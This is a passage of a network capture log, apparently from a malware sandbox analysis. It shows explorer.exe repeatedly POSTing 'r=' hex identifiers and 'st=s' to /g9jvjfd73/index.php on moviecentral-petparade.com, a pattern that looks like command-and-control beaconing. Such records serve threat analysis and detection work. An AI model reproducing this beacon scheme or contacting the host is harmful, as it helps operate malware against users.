Oct 31, 2024 14:26:09.717773914 CET	790	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CV8LoPUh48M%2Bm72PAAVpE46Xb6Cn278jQ%2BfMTL7ORYvlujHqsR7ZPY3NXwbj%2F3OuPC%2B9doOVmsSqlb7y8%2FtyEwznNV04NsJLCnIiReqyO4%2FGXunHzp%2FNnYS7k%2FOL%2FLA8ir7pgF5H3m9WoQ227g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9a4a8a46b97-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49997	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:11.239394903 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:12.105653048 CET	785	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5p3j%2Bzl%2FtrecYLlpvhE0nq05AdBOPDEUMmYMCpSUQ2KDhmCUx%2Bt3Wwb6%2BbtOmCBIinzGYKz9nfMuTzq8zJYKTyZOm14tacMYsFnI5fr6BsinRrGvkoZiBxl23SayZipyE7yu8kwbfYRxKFokg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9b38dd7ddb3-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=71&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49998	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:13.739603043 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:14.590442896 CET	784	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ro1uHPR1Xwo1XTvkuomD2d4XSoI4AVQfgfA%2BCSFrBXvRCTAFMpUBBAy0akw1XFV%2FW%2FVgAMg9D5AZJucy28fq9wA2%2FFV7XxONypT0IAzzbi%2BYZQVOSRMLrVShGUBsK0aj%2B4cbC8M5xJE6hPLQ5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9c32f0fddad-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49999	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:16.256545067 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:17.157974958 CET	788	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mm0HE%2B8i%2B7QT%2Bk8G%2FB90yD7azhjA6wAN4P39QyZB8ojBJOyb6TIynMEdZ5eOS%2F8Sx2TrvoUb38ivjrpkhsmLWR15OI0ldQ538SoaceHDkH8KuPHwhTm4hVY8hXorJuFSSdk3PXJ1hZLanvErxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9d30f48e803-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	50000	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:18.852936983 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:19.728466988 CET	776	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3bHP53iopgTKv48CT%2B%2BJhqQmlIvQIna5mGE9YELWi7g6tIAvzGQL95G140gnayVoFRJloYRElH7RKvTgUYMBS0VraAbfs0aQzBKqZsN3DFwB6v3eOLf6a1DNU8DgU6NBtqe4uL1f5dhvL9GFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9e33e4d28e0-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1609&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	50001	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:21.238836050 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:22.152596951 CET	781	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8olPpCqXr0jNcXUS9RYZuirqX5SvdxgyGIF3ZwiQpNY%2BaCFpOtV5kCv2J5hvd7TfF%2BbLxNU2JGYsEdC5QzTYWLxrJusJY6Mnjfb9wtZZyGCF1%2B4aw9%2BgEQI6fidOlIsBwbNhIBugB2tnjmPuiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9f21d9c47a5-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Oct 31, 2024 14:26:22.152916908 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	50002	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:23.786540031 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:24.677872896 CET	786	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ZlV%2Bl3tvYUq5Smh6Tp%2FA%2BUeSMrFIcgEeWtR%2FUIyLX6pSmhEoskvJQZaiTX0vFPUUusnO43JcdkP%2BPGT3LQ15V8TGxnW1LPXpt0%2BuVU71BGXRGsNxIsonB%2FRCY052fANnppBfGXqIRyR74Ry8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa022c932e7f-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	50003	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:26.222580910 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:27.099616051 CET	788	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pL6OTEIXZrP0tXNXE%2F3k9PjoDHFs3vDVk3kVl3oQlkPIahrjH0ZZylT7nvuRDsyIzeI50TvYeaXooCEbzffTImE%2FzBZXm6d7BMGlvubL%2FzUvvGzSsUy4VBSGSayOlG9%2FR%2BcVnN1MoGOQ5UTnCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa114ad76b8f-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	50004	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:28.769045115 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:29.635559082 CET	773	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FegmGAhhG1mbLfDOWipPUd5SO0K1gAeUsMS8w4DwMpgE7OBrNXW0hYDXfn2wR71%2BIQB7USAVZ27owI7%2BT6U4Krx%2Fj33N6wULlOovVJNUc7cqH7lbGBBSIV4NUlu4EQ4xvMUCgsjykaSxkyYyBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa212fd46ba0-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1082&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a Data Ascii: 1
Oct 31, 2024 14:26:29.635613918 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	50005	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:31.219444990 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:32.108320951 CET	779	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neHCUaEgZAQJWkboBF98OVsOUnJW0FaZWSCfYq0K%2BfhzmtHZETXuLth5duyccfdOpNybtF9QocTMYskuVrDu08r4PZpRFvrQQdEUIJ%2BvZqLg7MRDptmSAuRGtmUf3gTy30A%2FEqh83SruhMOHTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa308ab7e85f-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Oct 31, 2024 14:26:32.108341932 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	50006	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:33.737716913 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:34.627324104 CET	775	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCLso4pOSNu9rHcGJk1yqj3hTVsHLUlrL8s3cBDawiaCqbdLV%2Byc3ptNuAWPkFcpz%2Fj1C%2FpqRQ4gtFlZJ8LSKhQcFzSsxzlogs54KAUtiFux%2BeAJbUWNwIZHnchYTJi6Cx27AckxNFOp2p5fEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa4038302cd2-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1069&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a Data Ascii: 1
Oct 31, 2024 14:26:34.627351999 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	50007	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:36.152740002 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:37.057300091 CET	777	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cIDEkx2WXWSe4zWmbP1hGWsWTnOTgzj3RdXWSyMAgvam80ARvXnpF1tWpqo1%2FZWo5u4e968Kw9kxpxVQNTf6SNuFNxRx08vyHxI1cG37JCn3DZ8fMt864i3c3m7dDO%2Bvq1dzT0kmLNOCMs55UQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa4f6fbb6c33-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1269&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Oct 31, 2024 14:26:37.057357073 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	50008	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:38.693758011 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:39.610028028 CET	784	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVvJK%2FCbQNSkCtp3woQ9iJxzHty%2Fwx8siZ53cubkU3Q5%2B32T3a9au9jTyu%2BzJUYxDjpy%2BrmTJwirrHZuAj6Leid1R0FSK9ixTjrPY8vz%2Be1tujf72XQcHBsTQCdDFiEq4nHx1bYt9j9F2nxiRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa5f68534763-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1696&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	50009	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:41.130727053 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:42.002751112 CET	786	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOo%2BGG3EGrN45DR1KaPztTl47Q3AaNbN%2FruRq3V2sDGSYQQhDaigCON3Ykjjo8ua1NhXZfYjgYWYTdMvfcjg5HwgX8MpDiV%2Ba78FQdRUZW7cYw2Df%2BGX85xTOzAaelpyWmuMzpZ8jGrAcZhJIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa6e7f8de956-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1487&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	50010	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:43.629914999 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:44.584733009 CET	776	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFAM%2FbW6vUEGXC4ZfR1kc7iz1slNabwnqUlK9TaDkJhxrgxtXHuxylnwf3Hltie8Cx34NRT5sSwAo18eqJ%2BFduPBdRtrkiau98mGpWvVwZ4tiBvcPThCIDWMXgQGDv4Bb3oizUvJsFSkfjGbVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa7e0e68e781-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" 